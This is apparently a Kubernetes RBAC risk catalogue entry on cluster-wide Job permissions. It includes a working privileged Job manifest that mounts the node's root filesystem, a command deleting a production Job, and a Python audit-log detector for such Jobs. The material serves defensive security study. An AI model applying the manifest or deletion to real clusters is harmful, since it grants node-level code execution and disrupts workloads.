Manage Jobs cluster-wide (one-off privileged execution)
Elevation of Privilege
Critical
Overview
| Field | Value |
|---|---|
| ID | 1041 |
| Name | Manage Jobs cluster-wide (one-off privileged execution) |
| Risk Category | Elevation of Privilege |
| Risk Level | Critical |
| Role Type | ClusterRole |
| API Groups | batch |
| Resources | jobs |
| Verbs | create, update, patch, delete |
| Tags | PrivilegeEscalation Tampering WorkloadLifecycle |
Description
Grants create, update, patch and delete on Jobs in every namespace. A Job creates one or more pods to run a batch task, and those pods are created by the Job controller rather than by the requesting subject, so a holder of this permission can launch a one-off pod with privileged settings (host namespaces, a privileged security context, a hostPath mount of the node's root filesystem) without holding any direct permission on pods. The result is code execution on the node, privilege escalation, and tampering with host or workload state, unless an admission control such as Pod Security Admission rejects the pods such a template would create in the target namespace.
Abuse Scenarios
- Create a new Job that runs a privileged pod once.

```bash
kubectl create -n <namespace> -f - <<EOF
apiVersion: batch/v1
kind: Job
metadata:
  name: privileged-job
spec:
  template:
    spec:
      hostNetwork: true
      hostPID: true
      containers:
      - name: attacker
        image: busybox
        command: ["/bin/sh", "-c", "echo 'Job Pwned!' > /host/job_pwned.txt"]
        securityContext:
          privileged: true
        volumeMounts:
        - mountPath: /host
          name: host-root
      volumes:
      - name: host-root
        hostPath:
          path: /
      restartPolicy: OnFailure
EOF
# Example: kubectl create -n default -f - <<EOF ... EOF
```
- Delete a critical Job, preventing a one-off task from completing.

```bash
kubectl delete job <job-name> -n <namespace>
# Example: kubectl delete job db-migration-job -n production
```
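A detection check that matches both scenarios above, added here as an example and not part of the catalogue entry: it scans Kubernetes audit log lines for writes to `batch/jobs` and rates as critical any Job body whose pod template carries the host-level settings used in the privileged Job (host namespaces, privileged containers, hostPath volumes), while deletes and benign creates are still recorded. The audit events are constructed samples; field names follow the Kubernetes audit Event schema (`stage`, `verb`, `user.username`, `objectRef`, `requestObject`), and `requestObject` is only present when the audit policy level is `Request` or `RequestResponse`.

```python
import json

# Constructed sample audit events (Request-level policy, so requestObject is present); not real data.
def _event(stage, verb, user, ns, name, pod_spec=None):
    ev = {"stage": stage, "verb": verb, "user": {"username": user}, "objectRef": {
        "apiGroup": "batch", "resource": "jobs", "namespace": ns, "name": name}}
    if pod_spec is not None:  # deletes carry no Job body
        ev["requestObject"] = {"spec": {"template": {"spec": pod_spec}}}
    return json.dumps(ev)

SAMPLE_AUDIT_LINES = [
    _event("ResponseComplete", "create", "system:serviceaccount:dev:ci-runner", "default",
           "privileged-job", {"hostNetwork": True, "hostPID": True,
                              "containers": [{"name": "attacker", "image": "busybox",
                                              "securityContext": {"privileged": True}}],
                              "volumes": [{"name": "host-root", "hostPath": {"path": "/"}}]}),
    _event("ResponseComplete", "create", "alice", "production", "db-migration-job",
           {"containers": [{"name": "migrate", "image": "migrator:1.2"}]}),
    _event("RequestReceived", "delete", "alice", "production", "db-migration-job"),
    _event("ResponseComplete", "delete", "alice", "production", "db-migration-job"),
]

WRITE_VERBS = {"create", "update", "patch", "delete"}

def host_privilege_flags(pod_spec: dict) -> list[str]:
    """Host-access settings that make a Job's pod equivalent to a privileged pod."""
    flags = [k for k in ("hostNetwork", "hostPID", "hostIPC") if pod_spec.get(k) is True]
    for c in pod_spec.get("containers", []) + pod_spec.get("initContainers", []):
        if (c.get("securityContext") or {}).get("privileged") is True:
            flags.append(f"privileged:{c.get('name')}")
    for v in pod_spec.get("volumes", []):
        if "hostPath" in v:
            flags.append(f"hostPath:{v['hostPath'].get('path')}")
    return flags

def scan_job_writes(lines) -> list[dict]:
    """One finding per write to batch/jobs; only ResponseComplete is counted so each request
    appears once. For 'patch' requestObject is the patch body, so flags may be incomplete."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        ref = ev.get("objectRef") or {}
        if (ev.get("stage") != "ResponseComplete" or ev.get("verb") not in WRITE_VERBS
                or ref.get("apiGroup") != "batch" or ref.get("resource") != "jobs"):
            continue
        tmpl = ((ev.get("requestObject") or {}).get("spec") or {}).get("template") or {}
        flags = host_privilege_flags(tmpl.get("spec") or {})
        findings.append({"user": ev["user"]["username"], "verb": ev["verb"], "job": ref.get("name"),
                         "namespace": ref.get("namespace"), "flags": flags,
                         "severity": "critical" if flags else "notice"})
    return findings
```

Feed it the output of `kubectl` audit logs as JSON lines; the duplicate `RequestReceived` event in the sample shows why only the `ResponseComplete` stage is counted.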